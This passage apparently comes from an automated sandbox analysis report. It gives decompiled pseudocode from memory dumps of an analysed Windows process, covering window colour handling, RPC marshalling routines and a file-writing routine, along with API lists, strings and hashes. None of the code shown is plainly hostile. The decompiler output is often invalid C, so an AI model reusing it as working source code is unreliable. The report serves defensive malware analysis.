                                                                                                • Instruction Fuzzy Hash: 41119351809B912DFB3216244C44B77BFA9CB96760F18447BE9D4622C2C6BCBC829B7D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00403D44(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                                                                				struct tagLOGBRUSH _v16;
                                                                                                				long _t35;
                                                                                                				long _t37;
                                                                                                				void* _t40;
                                                                                                				long* _t49;
                                                                                                
                                                                                                				if(_a4 + 0xfffffecd > 5) {
                                                                                                					L15:
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t49 = GetWindowLongA(_a12, 0xffffffeb);
                                                                                                				if(_t49 == 0) {
                                                                                                					goto L15;
                                                                                                				}
                                                                                                				_t35 =  *_t49;
                                                                                                				if((_t49[5] & 0x00000002) != 0) {
                                                                                                					_t35 = GetSysColor(_t35);
                                                                                                				}
                                                                                                				if((_t49[5] & 0x00000001) != 0) {
                                                                                                					SetTextColor(_a8, _t35);
                                                                                                				}
                                                                                                				SetBkMode(_a8, _t49[4]);
                                                                                                				_t37 = _t49[1];
                                                                                                				_v16.lbColor = _t37;
                                                                                                				if((_t49[5] & 0x00000008) != 0) {
                                                                                                					_t37 = GetSysColor(_t37);
                                                                                                					_v16.lbColor = _t37;
                                                                                                				}
                                                                                                				if((_t49[5] & 0x00000004) != 0) {
                                                                                                					SetBkColor(_a8, _t37);
                                                                                                				}
                                                                                                				if((_t49[5] & 0x00000010) != 0) {
                                                                                                					_v16.lbStyle = _t49[2];
                                                                                                					_t40 = _t49[3];
                                                                                                					if(_t40 != 0) {
                                                                                                						DeleteObject(_t40);
                                                                                                					}
                                                                                                					_t49[3] = CreateBrushIndirect( &_v16);
                                                                                                				}
                                                                                                				return _t49[3];
                                                                                                			}









                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                • String ID:
                                                                                                • API String ID: 2320649405-0
                                                                                                • Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                • Instruction ID: ac003594d1dcb8ae4d3b01263828f587cf1b0240a4208d46790e3dc2010cfdd8
                                                                                                • Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
                                                                                                • Instruction Fuzzy Hash: 58218471904744ABC7219F78DD08B9B7FFCAF01715F048A29E895E22E0D739E904CB55
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 63%
                                                                                                			E6EDADE30(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                                                                                				signed int _v5;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				signed int _v24;
                                                                                                				signed int _v28;
                                                                                                				signed int _v32;
                                                                                                				signed int _v36;
                                                                                                				signed int _t158;
                                                                                                
                                                                                                				_v24 = _a4 & 0x000000ff;
                                                                                                				_v24 = _v24 - 0x1b;
                                                                                                				if(_v24 > 0xa) {
                                                                                                					L26:
                                                                                                					_t158 = _a4 & 0x000000ff;
                                                                                                					0x6eda0000("unknown array format 0x%x\n", _t158);
                                                                                                					__imp__RpcRaiseException(0x6f7);
                                                                                                					return _t158;
                                                                                                				}
                                                                                                				_t7 = _v24 + 0x6edae1fc; // 0xcccccc03
                                                                                                				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6EDAE1E8))) {
                                                                                                					case 0:
                                                                                                						_v12 =  *(_a12 + 2) & 0x0000ffff;
                                                                                                						_v5 = ( *(_a12 + (1 << 0)) & 0x000000ff) + 1;
                                                                                                						_a12 = E6EDAA440(_a8, _a12 + 4);
                                                                                                						_v16 = E6EDAAEC0(_v12,  *(_a8 + 0x3c));
                                                                                                						_v20 = _v16;
                                                                                                						 *(_a8 + 0x18) =  *(_a8 + 0x18) + _v16;
                                                                                                						E6EDA73D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
                                                                                                						if((_a16 & 0x000000ff) != 0) {
                                                                                                							 *(_a8 + 0x10) =  *(_a8 + 4);
                                                                                                						}
                                                                                                						_t171 = E6EDAAF00(_a8, _v20);
                                                                                                						if((_a16 & 0x000000ff) != 0) {
                                                                                                							_t171 = E6EDAC7E0(_a8, _a12);
                                                                                                						}
                                                                                                						return _t171;
                                                                                                					case 1:
                                                                                                						__edx = _a12;
                                                                                                						__eax =  *(__edx + 2) & 0x0000ffff;
                                                                                                						_v12 =  *(__edx + 2) & 0x0000ffff;
                                                                                                						1 = 1 << 0;
                                                                                                						__edx = _a12;
                                                                                                						 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) + 1;
                                                                                                						_v5 = __al;
                                                                                                						_a12 = _a12 + 4;
                                                                                                						__edx = _a8;
                                                                                                						_a12 = E6EDAA440(_a8, _a12 + 4);
                                                                                                						__eax = _a8;
                                                                                                						__ecx =  *(_a8 + 0x3c);
                                                                                                						__edx = _a12;
                                                                                                						__eax = _a8;
                                                                                                						_a12 = E6EDAA540( *(_a8 + 0x3c), _a8, _a12,  *(_a8 + 0x3c));
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(_a8 + 0x44);
                                                                                                						__eax = _v12;
                                                                                                						_v20 = E6EDAAEC0(_v12,  *(_a8 + 0x44));
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(_a8 + 0x3c);
                                                                                                						__eax = _v12;
                                                                                                						_v16 = E6EDAAEC0(_v12,  *(_a8 + 0x3c));
                                                                                                						__ecx = _a8;
                                                                                                						 *(__ecx + 0x18) =  *(__ecx + 0x18) + _v16;
                                                                                                						__eax = _a8;
                                                                                                						 *(_a8 + 0x18) =  *(__ecx + 0x18) + _v16;
                                                                                                						__ecx = _v5 & 0x000000ff;
                                                                                                						_a8 = _a8 + 4;
                                                                                                						E6EDA73D0(_v5 & 0x000000ff, _a8 + 4, _v5 & 0x000000ff) = _a16 & 0x000000ff;
                                                                                                						if((_a16 & 0x000000ff) != 0) {
                                                                                                							__ecx = _a8;
                                                                                                							__edx = _a8;
                                                                                                							__eax =  *(__edx + 4);
                                                                                                							 *(_a8 + 0x10) =  *(__edx + 4);
                                                                                                						}
                                                                                                						__ecx = _v20;
                                                                                                						__edx = _a8;
                                                                                                						__eax = E6EDAAF00(_a8, _v20);
                                                                                                						__eax = _a16 & 0x000000ff;
                                                                                                						if(__eax != 0) {
                                                                                                							__ecx = _a12;
                                                                                                							__edx = _a8;
                                                                                                							__eax = E6EDAC7E0(_a8, _a12);
                                                                                                						}
                                                                                                						return __eax;
                                                                                                					case 2:
                                                                                                						1 = 1 << 0;
                                                                                                						__edx = _a12;
                                                                                                						 *(__edx + (1 << 0)) & 0x000000ff = ( *(__edx + (1 << 0)) & 0x000000ff) + 1;
                                                                                                						_v5 = __al;
                                                                                                						_a12 = _a12 + 4;
                                                                                                						__edx = _a8;
                                                                                                						_a12 = E6EDAA440(_a8, _a12 + 4);
                                                                                                						__eax = _a8;
                                                                                                						__ecx =  *(_a8 + 0x3c);
                                                                                                						__edx = _a12;
                                                                                                						__eax = _a8;
                                                                                                						_a12 = E6EDAA540( *(_a8 + 0x3c), _a8, _a12,  *(_a8 + 0x3c));
                                                                                                						__ecx = _v5 & 0x000000ff;
                                                                                                						_a8 = _a8 + 4;
                                                                                                						__eax = E6EDA73D0(_v5 & 0x000000ff, _a8 + 4, _v5 & 0x000000ff);
                                                                                                						__eax = _a8;
                                                                                                						__ecx =  *(__eax + 0x18);
                                                                                                						_v36 =  *(__eax + 0x18);
                                                                                                						__edx = _a12;
                                                                                                						_push(_a12);
                                                                                                						__eax = _a8;
                                                                                                						_push(__eax);
                                                                                                						0x6eda0000();
                                                                                                						__esp = __esp + 8;
                                                                                                						_v12 = __eax;
                                                                                                						__ecx = _v12;
                                                                                                						__edx = _a8;
                                                                                                						__eax =  *(_a8 + 0x3c);
                                                                                                						__eax = E6EDAAEC0( *(_a8 + 0x3c), _v12);
                                                                                                						_v16 = __eax;
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(__ecx + 0x44);
                                                                                                						_v32 =  *(__ecx + 0x44);
                                                                                                						_v28 = 0;
                                                                                                						while(1) {
                                                                                                							__ecx = _v28;
                                                                                                							if(_v28 >= _v32) {
                                                                                                								break;
                                                                                                							}
                                                                                                							__edx = _a12;
                                                                                                							_a8 = E6EDA9BE0(_a8, _a12, 0);
                                                                                                							__eax = _v28;
                                                                                                							__eax = _v28 + 1;
                                                                                                							_v28 = __eax;
                                                                                                						}
                                                                                                						_v36 = _v36 + _v16;
                                                                                                						__edx = _a8;
                                                                                                						 *(_a8 + 0x18) = _v36 + _v16;
                                                                                                						return __eax;
                                                                                                					case 3:
                                                                                                						__eax = _a4 & 0x000000ff;
                                                                                                						if((_a4 & 0x000000ff) != 0x22) {
                                                                                                							_v12 = 2;
                                                                                                						} else {
                                                                                                							_v12 = 1;
                                                                                                						}
                                                                                                						__ecx = _a8;
                                                                                                						__edx =  *(__ecx + 0x3c);
                                                                                                						_a8 = E6EDAA540(__ecx, _a8, 0,  *(__ecx + 0x3c));
                                                                                                						1 = 1 << 0;
                                                                                                						__edx = _a12;
                                                                                                						__eax =  *(__edx + (1 << 0)) & 0x000000ff;
                                                                                                						if(( *(__edx + (1 << 0)) & 0x000000ff) != 0x44) {
                                                                                                							__ecx = _a8;
                                                                                                							__edx = _a8;
                                                                                                							__eax =  *(__ecx + 0x3c);
                                                                                                							if( *(__ecx + 0x3c) !=  *(_a8 + 0x44)) {
                                                                                                								__ecx = _a8;
                                                                                                								__edx =  *(__ecx + 0x3c);
                                                                                                								_push( *(__ecx + 0x3c));
                                                                                                								__eax = _a8;
                                                                                                								__ecx =  *(__eax + 0x44);
                                                                                                								_push( *(__eax + 0x44));
                                                                                                								_push("buffer size %d must equal memory size %ld for non-sized conformant strings\n");
                                                                                                								0x6eda0000();
                                                                                                								__esp = __esp + 0xc;
                                                                                                								_push(0x6c6);
                                                                                                								__imp__RpcRaiseException();
                                                                                                							}
                                                                                                						}
                                                                                                						__edx = _a8;
                                                                                                						if( *((intOrPtr*)(_a8 + 0x40)) != 0) {
                                                                                                							__eax = _a8;
                                                                                                							__ecx =  *(__eax + 0x40);
                                                                                                							_push( *(__eax + 0x40));
                                                                                                							_push("conformant strings can\'t have Offset (%d)\n");
                                                                                                							0x6eda0000();
                                                                                                							__esp = __esp + 8;
                                                                                                							_push(0x6c6);
                                                                                                							__imp__RpcRaiseException();
                                                                                                						}
                                                                                                						__edx = _a8;
                                                                                                						__eax =  *(_a8 + 0x3c);
                                                                                                						__ecx = _v12;
                                                                                                						_v16 = E6EDAAEC0(_v12,  *(_a8 + 0x3c));
                                                                                                						__edx = _a8;
                                                                                                						__eax =  *(_a8 + 0x44);
                                                                                                						__ecx = _v12;
                                                                                                						_v20 = E6EDAAEC0(_v12,  *(_a8 + 0x44));
                                                                                                						__edx = _v12;
                                                                                                						__eax = _v20;
                                                                                                						__ecx = _a8;
                                                                                                						__eax = E6EDAB0C0(_a8, _a8, _v20, _v12);
                                                                                                						__edx = _v20;
                                                                                                						_a8 = E6EDAAF00(_a8, _v20);
                                                                                                						__ecx = _a8;
                                                                                                						 *(__ecx + 0x18) =  *(__ecx + 0x18) + _v16;
                                                                                                						__eax = _a8;
                                                                                                						 *(__eax + 0x18) =  *(__ecx + 0x18) + _v16;
                                                                                                						return __eax;
                                                                                                					case 4:
                                                                                                						goto L26;
                                                                                                				}
                                                                                                			}












                                                                                                0x6edae153
                                                                                                0x6edae156
                                                                                                0x6edae159
                                                                                                0x6edae15c
                                                                                                0x6edae15d
                                                                                                0x6edae160
                                                                                                0x6edae161
                                                                                                0x6edae166
                                                                                                0x6edae169
                                                                                                0x6edae16c
                                                                                                0x6edae170
                                                                                                0x6edae173
                                                                                                0x6edae177
                                                                                                0x6edae17f
                                                                                                0x6edae182
                                                                                                0x6edae185
                                                                                                0x6edae188
                                                                                                0x6edae18b
                                                                                                0x6edae19d
                                                                                                0x6edae19d
                                                                                                0x6edae1a3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edae1a7
                                                                                                0x6edae1af
                                                                                                0x6edae194
                                                                                                0x6edae197
                                                                                                0x6edae19a
                                                                                                0x6edae19a
                                                                                                0x6edae1bc
                                                                                                0x6edae1bf
                                                                                                0x6edae1c2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6edadff5
                                                                                                0x6edadffc
                                                                                                0x6edae007
                                                                                                0x6edadffe
                                                                                                0x6edadffe
                                                                                                0x6edadffe
                                                                                                0x6edae00e
                                                                                                0x6edae011
                                                                                                0x6edae01b
                                                                                                0x6edae028
                                                                                                0x6edae02b
                                                                                                0x6edae02e
                                                                                                0x6edae035
                                                                                                0x6edae037
                                                                                                0x6edae03a
                                                                                                0x6edae03d
                                                                                                0x6edae043
                                                                                                0x6edae045
                                                                                                0x6edae048
                                                                                                0x6edae04b
                                                                                                0x6edae04c
                                                                                                0x6edae04f
                                                                                                0x6edae052
                                                                                                0x6edae053
                                                                                                0x6edae058
                                                                                                0x6edae05d
                                                                                                0x6edae060
                                                                                                0x6edae065
                                                                                                0x6edae065
                                                                                                0x6edae043
                                                                                                0x6edae06b
                                                                                                0x6edae072
                                                                                                0x6edae074
                                                                                                0x6edae077
                                                                                                0x6edae07a
                                                                                                0x6edae07b
                                                                                                0x6edae080
                                                                                                0x6edae085
                                                                                                0x6edae088
                                                                                                0x6edae08d
                                                                                                0x6edae08d
                                                                                                0x6edae093
                                                                                                0x6edae096
                                                                                                0x6edae09a
                                                                                                0x6edae0a6
                                                                                                0x6edae0a9
                                                                                                0x6edae0ac
                                                                                                0x6edae0b0
                                                                                                0x6edae0bc
                                                                                                0x6edae0bf
                                                                                                0x6edae0c3
                                                                                                0x6edae0c7
                                                                                                0x6edae0cb
                                                                                                0x6edae0d3
                                                                                                0x6edae0db
                                                                                                0x6edae0e3
                                                                                                0x6edae0e9
                                                                                                0x6edae0ec
                                                                                                0x6edae0ef
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDAE065
                                                                                                • RpcRaiseException.RPCRT4(000006C6), ref: 6EDAE08D
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDAE1DE
                                                                                                Strings
                                                                                                • buffer size %d must equal memory size %ld for non-sized conformant strings, xrefs: 6EDAE053
                                                                                                • unknown array format 0x%x, xrefs: 6EDAE1CC
                                                                                                • conformant strings can't have Offset (%d), xrefs: 6EDAE07B
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: buffer size %d must equal memory size %ld for non-sized conformant strings$conformant strings can't have Offset (%d)$unknown array format 0x%x
                                                                                                • API String ID: 3997070919-1066441581
                                                                                                • Opcode ID: 9a6b46ecdba052145924c0dccbe1fa80a37ade88e291d5682352a5cceaedc133
                                                                                                • Instruction ID: 95a3f7e4d962e8803a35a50f50be68172203c4c6a1525b1e67172fbef6fd4f9e
                                                                                                • Opcode Fuzzy Hash: 9a6b46ecdba052145924c0dccbe1fa80a37ade88e291d5682352a5cceaedc133
                                                                                                • Instruction Fuzzy Hash: C8D15EB5A00109AFCB44CF98D890AAEBBB5BF88204F14C559FE199B341D335EB51CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA47D0(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16) {
                                                                                                				intOrPtr _v8;
                                                                                                				signed int _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _v20;
                                                                                                				char _v48;
                                                                                                				intOrPtr _t114;
                                                                                                				void* _t182;
                                                                                                				void* _t185;
                                                                                                				void* _t186;
                                                                                                				void* _t187;
                                                                                                
                                                                                                				_v12 =  *(_a12 + (1 << 0)) & 0x000000ff;
                                                                                                				_v20 =  *(_a12 + (1 << 1)) & 0x0000ffff;
                                                                                                				_v16 =  *(_a12 + (1 << 2)) & 0x0000ffff;
                                                                                                				_v8 = 0;
                                                                                                				0x6eda0000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                                				0x6eda0000("index=%d\n", _v20);
                                                                                                				_t130 = _a4;
                                                                                                				E6EDAE8C0(_a4, 2, _a12,  &_v48);
                                                                                                				_t185 = _t182 + 0x2c;
                                                                                                				if((_v12 & 0x000000c0) == 0) {
                                                                                                					E6EDA73D0(_a4 + 4, _a4 + 4, (_v12 & 0x0000000f) + 1);
                                                                                                					_t186 = _t185 + 8;
                                                                                                				} else {
                                                                                                					E6EDA73D0(_t130, _a4 + 4, 4);
                                                                                                					_t187 = _t185 + 8;
                                                                                                					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + 4;
                                                                                                					_t152 = _a4;
                                                                                                					if( *((intOrPtr*)(_a4 + 0x34)) != 0) {
                                                                                                						_v8 =  *((intOrPtr*)(_a4 + 4));
                                                                                                						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                                						_t152 = _a4;
                                                                                                						 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                                					}
                                                                                                					E6EDA73D0(_t152, _a4 + 4, 8);
                                                                                                					_t186 = _t187 + 8;
                                                                                                				}
                                                                                                				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                                					_a16 = 1;
                                                                                                				}
                                                                                                				if((_a16 & 0x000000ff) != 0) {
                                                                                                					_t114 = _a4;
                                                                                                					__imp__NdrAllocate(_t114, _v16);
                                                                                                					 *_a8 = _t114;
                                                                                                					E6EDB0770( *_a8, 0, _v16);
                                                                                                					_t186 = _t186 + 0xc;
                                                                                                				}
                                                                                                				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x38)) + (_v20 << 4) + 8))))( &_v48,  *((intOrPtr*)(_a4 + 4)),  *_a8);
                                                                                                				if(_v8 != 0) {
                                                                                                					do {
                                                                                                						0x6eda0000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
                                                                                                						_t186 = _t186 + 0xc;
                                                                                                						if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
                                                                                                							0x6eda0000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
                                                                                                							_t186 = _t186 + 8;
                                                                                                						}
                                                                                                					} while (0 != 0);
                                                                                                					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
                                                                                                					 *((intOrPtr*)(_a4 + 4)) = _v8;
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}














                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Allocate_memset
                                                                                                • String ID: (%p,%p,%p,%d)$buffer overflow %d bytes$buffer=%d/%d$index=%d
                                                                                                • API String ID: 3995017260-3620127348
                                                                                                • Opcode ID: 24aaffa088c19a37a352a82f26acf20333c093fb9209285fd6ad35df60578612
                                                                                                • Instruction ID: 8740b57dcb71fddf9500c68b5c1e2e6b67221fd8b4fb8edc63aa99e9de1f1027
                                                                                                • Opcode Fuzzy Hash: 24aaffa088c19a37a352a82f26acf20333c093fb9209285fd6ad35df60578612
                                                                                                • Instruction Fuzzy Hash: 9D710EB5A00208EFDB04CF58C890EAA7BB6FF88354F14C558E9599F345D731EA52CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 32%
                                                                                                			E6EDA4DE0(signed char* _a4, intOrPtr _a8, signed char* _a12) {
                                                                                                				signed char* _v8;
                                                                                                				signed char* _v12;
                                                                                                				signed int _v16;
                                                                                                				signed char* _t52;
                                                                                                				signed int _t63;
                                                                                                				signed int _t66;
                                                                                                				signed char* _t67;
                                                                                                
                                                                                                				_v8 = _a12;
                                                                                                				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
                                                                                                				_a12 = _a12 + 6;
                                                                                                				if(( *_v8 & 0x000000ff) != 0x18 && ( *_v8 & 0x000000ff) != 0x17) {
                                                                                                					_t67 = _v8;
                                                                                                					0x6eda0000("invalid format type %x\n",  *_t67 & 0x000000ff);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return _t67;
                                                                                                				}
                                                                                                				_v12 =  &(_v8[_v8[4] + 4]);
                                                                                                				__eflags = ( *_v12 & 0x000000ff) - 0x1b;
                                                                                                				if(__eflags != 0) {
                                                                                                					_t66 =  *_v8 & 0x000000ff;
                                                                                                					0x6eda0000("invalid array format type %x\n", _t66);
                                                                                                					__imp__RpcRaiseException(0x6e6);
                                                                                                					return _t66;
                                                                                                				}
                                                                                                				_v16 = _v12[2] & 0x0000ffff;
                                                                                                				_t52 = _a4;
                                                                                                				0x6eda0000(_t52, (_v8[2] & 0x0000ffff) + _a8,  &(_v12[4]), 0);
                                                                                                				_v12 = _t52;
                                                                                                				E6EDAA960(__eflags, _a4);
                                                                                                				E6EDA73B0( &(_a4[0x14]), (_v8[1] & 0x000000ff) + 1);
                                                                                                				0x6eda0000("memory_size = %d\n", _v8[2] & 0x0000ffff);
                                                                                                				E6EDAAF50(_a4, _v8[2] & 0x0000ffff);
                                                                                                				E6EDAAF50(_a4, E6EDAAEC0(_a4[0x3c], _v16));
                                                                                                				_t63 =  *_v8 & 0x000000ff;
                                                                                                				__eflags = _t63 - 0x18;
                                                                                                				if(_t63 == 0x18) {
                                                                                                					return E6EDAC570(_a4, _a8, _a12);
                                                                                                				}
                                                                                                				return _t63;
                                                                                                			}











                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA4E3D
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA4E7D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid array format type %x$invalid format type %x$memory_size = %d
                                                                                                • API String ID: 3997070919-2774118540
                                                                                                • Opcode ID: fdb3555e783afd06f18b6c030c9642ad49379a3a8dd5320f563f0718df9167fa
                                                                                                • Instruction ID: 8092c8feda90abbae3c8890722dc1f7482dff57c5fa4bd904ad0295ba4a932e7
                                                                                                • Opcode Fuzzy Hash: fdb3555e783afd06f18b6c030c9642ad49379a3a8dd5320f563f0718df9167fa
                                                                                                • Instruction Fuzzy Hash: 2F4194B5A04104FBCB44CFD8D890DAEBBBAAF85205F148588F9499B341E731EF51CBA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 86%
                                                                                                			E0040266E(struct _OVERLAPPED* __ebx) {
                                                                                                				void* _t27;
                                                                                                				long _t32;
                                                                                                				struct _OVERLAPPED* _t47;
                                                                                                				void* _t51;
                                                                                                				void* _t53;
                                                                                                				void* _t56;
                                                                                                				void* _t57;
                                                                                                				void* _t58;
                                                                                                
                                                                                                				_t47 = __ebx;
                                                                                                				 *(_t58 - 8) = 0xfffffd66;
                                                                                                				_t52 = E004029E8(0xfffffff0);
                                                                                                				 *(_t58 - 0x44) = _t24;
                                                                                                				if(E0040548B(_t52) == 0) {
                                                                                                					E004029E8(0xffffffed);
                                                                                                				}
                                                                                                				E004055E3(_t52);
                                                                                                				_t27 = E00405602(_t52, 0x40000000, 2);
                                                                                                				 *(_t58 + 8) = _t27;
                                                                                                				if(_t27 != 0xffffffff) {
                                                                                                					_t32 =  *0x42eb74; // 0x33000
                                                                                                					 *(_t58 - 0x2c) = _t32;
                                                                                                					_t51 = GlobalAlloc(0x40, _t32);
                                                                                                					if(_t51 != _t47) {
                                                                                                						E00403098(_t47);
                                                                                                						E00403066(_t51,  *(_t58 - 0x2c));
                                                                                                						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
                                                                                                						 *(_t58 - 0x30) = _t56;
                                                                                                						if(_t56 != _t47) {
                                                                                                							E00402E44( *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
                                                                                                							while( *_t56 != _t47) {
                                                                                                								_t49 =  *_t56;
                                                                                                								_t57 = _t56 + 8;
                                                                                                								 *(_t58 - 0x38) =  *_t56;
                                                                                                								E004055C3( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
                                                                                                								_t56 = _t57 +  *(_t58 - 0x38);
                                                                                                							}
                                                                                                							GlobalFree( *(_t58 - 0x30));
                                                                                                						}
                                                                                                						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
                                                                                                						GlobalFree(_t51);
                                                                                                						 *(_t58 - 8) = E00402E44(0xffffffff,  *(_t58 + 8), _t47, _t47);
                                                                                                					}
                                                                                                					CloseHandle( *(_t58 + 8));
                                                                                                				}
                                                                                                				_t53 = 0xfffffff3;
                                                                                                				if( *(_t58 - 8) < _t47) {
                                                                                                					_t53 = 0xffffffef;
                                                                                                					DeleteFileA( *(_t58 - 0x44));
                                                                                                					 *((intOrPtr*)(_t58 - 4)) = 1;
                                                                                                				}
                                                                                                				_push(_t53);
                                                                                                				E00401423();
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t58 - 4));
                                                                                                				return 0;
                                                                                                			}












                                                                                                APIs
                                                                                                • GlobalAlloc.KERNEL32(00000040,00033000,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
                                                                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
                                                                                                • GlobalFree.KERNEL32 ref: 00402717
                                                                                                • WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
                                                                                                • GlobalFree.KERNEL32 ref: 00402730
                                                                                                • CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
                                                                                                • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
